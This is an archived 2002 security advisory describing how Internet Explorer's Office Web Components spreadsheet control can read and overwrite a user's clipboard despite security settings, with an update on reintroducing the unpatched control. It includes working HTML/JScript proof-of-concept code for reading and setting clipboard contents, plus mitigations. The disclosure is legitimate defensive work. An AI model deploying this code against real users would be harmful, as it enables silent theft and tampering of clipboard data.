Products::Security

GreyMagic Security Advisory GM#007-IE

By GreyMagic Software, Israel.
08 Apr 2002.

Topic: Controlling the clipboard with OWC in IE.

Discovery date: 24 Feb 2002.

Affected applications:
Introduction:

Office Web Components (OWC) is a group of safe for scripting components used to enrich HTML documents with Spreadsheets, Charts, Pivot tables and more.

OWC ships with the Microsoft Office package, but it is also downloadable as a separate (free for viewing only) component.

Discussion:

It is well documented that IE lets anybody read and write clipboard data by default, until now it was possible to disable this feature by setting "Allow paste operations via script" to "Disable".

It is now possible to gain control over the clipboard even when it is disabled in the security zone, via the Spreadsheet component in both OWC9 and OWC10.

The "Paste" method of the Range object and the "Copy" method of the Cell object both give an attacker full control over clipboard operations.

The attacker can continuously monitor the victim's clipboard and log the findings to a server for later inspection. It is also possible for an attacker to place data inside the clipboard.

Update (22-Aug-2002):

Microsoft has released a patch for these issues, however, the "Kill Bit" was not set for the vulnerable OWC version. This means that an attacker can easily reintroduce the old OWC, properly signed by Microsoft, and gain complete access to the vulnerabilities we found. And unlike Microsoft claims, it's not that easy to notice it install itself, an attacker can open an off-screen window that will silently install OWC without the user knowing.

This is a fundamental problem in the patch and it renders it quite useless for users who set their IE to trust content from Microsoft or users that tend to click "Yes" when they see controls signed by Microsoft.

Exploit:

Reading the contents of the clipboard:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    // Paste to spreadsheet
    oSP.ActiveSheet.UsedRange.Paste();

    // Read the spreadsheet
    var oRng=oSP.ActiveSheet.UsedRange,
        iRows=oRng.Rows.Count,
        iCols=oRng.Columns.Count,
        sRes="";

    for (var iCRow=1;iCRow<=iRows;iCRow++) {
        for (var iCCol=1;iCCol<=iCols;iCCol++) {
            sRes+=(oSP.Cells(iCRow,iCCol).Value || "")+"\t";
        }
        sRes+="\n";
    }

    // Display result
    alert(sRes);
}
</script>

Assigning the clipboard's content:

<object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP" style="display:none"></object>
<script language="jscript">
onload=function () {
    oSP.Cells(1,1).Value="Trustworthy computing";
    oSP.Cells(1,1).Copy();
}
</script>

The class id of the <object> element above is for the spreadsheet component of OWC9 (Microsoft Office 2000), OWC10's class id is "0002E551-0000-0000-C000-000000000046", no further changes in code are needed.

An attacker can actually use the fallback feature of the <object> element to include either one of these components:

<!-- Try to include OWC10 -->
<object classid="clsid:0002E551-0000-0000-C000-000000000046" id="oSP10" style="display:none">
    <!-- Failed, try to include OWC9 -->
    <object classid="clsid:0002E510-0000-0000-C000-000000000046" id="oSP9" style="display:none">
        <!-- None found -->
        Failed to load any of the spreadsheet components.
    </object>
</object>

Solution:

Set "Run ActiveX controls and plug-ins" to "Disable" or simply remove/disable OWC until a patch becomes available.

Microsoft has been informed, they have opened an investigation regarding this issue.

Tested on:

IE5 NT4 + Office 2000 (OWC9).
IE5.5 NT4 + Office 2000 (OWC9).
IE5.5 NT4 + OWC10.
IE6 Win2000 + Office 2000 (OWC9).
IE6 WinXP + Office XP (OWC10).

Demonstration:

Click on "Copy" to copy the string in the text input to the clipboard.

Click on "Spy" to start monitoring the clipboard, when the clipboard data will change the new data will be shown in the list.

Status: Off.

    Disclaimer:

    The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

    Vulnerability details are provided strictly for educational and defensive purposes.

    GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

    Stay informed:

    Subscribe to GreyMagic's early notification email service and be informed of new vulnerabilities and updates as soon as they appear on the site.

    Press here to subscribe.

    Your privacy is important to us, read our Privacy Statement.

    Copyright © 2008 GreyMagic Software
    Hosted by VPW Systems UK - Specialist Internet Services Provider